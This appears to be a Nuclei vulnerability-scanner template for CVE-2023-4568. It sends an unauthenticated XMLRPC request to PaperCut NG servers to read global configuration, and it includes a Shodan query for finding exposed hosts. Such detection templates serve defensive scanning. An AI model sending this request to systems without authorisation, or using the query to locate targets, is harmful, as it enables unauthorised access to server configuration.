57 lines
1.9 KiB
YAML
57 lines
1.9 KiB
YAML
id: CVE-2023-4568
|
|
|
|
info:
|
|
name: PaperCut NG Unauthenticated XMLRPC Functionality
|
|
author: DhiyaneshDK
|
|
severity: medium
|
|
description: |
|
|
PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4568
|
|
- https://www.tenable.com/security/research/tra-2023-31
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2023-4568
|
|
cwe-id: CWE-287
|
|
epss-score: 0.00254
|
|
epss-percentile: 0.6331
|
|
cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: papercut
|
|
product: papercut_ng
|
|
shodan-query: html:"content=\"PaperCut\""
|
|
tags: cve2023,cve,unauth,papercut
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /rpc/clients/xmlrpc HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type:text/xml
|
|
|
|
<?xml version="1.0"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'conf.ssl-port'
|
|
- 'conf.auth-ttl-default'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/xml
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100ee5ada48a3dd406ae7018f21602051a17a932e804c07e4ccce39b100785650b6022100bcffae90accdde9bd822c98681bfe4d53eda75f993855cdf552fa3ca9519dc22:922c64590222798bb761d5b6d8e72950
|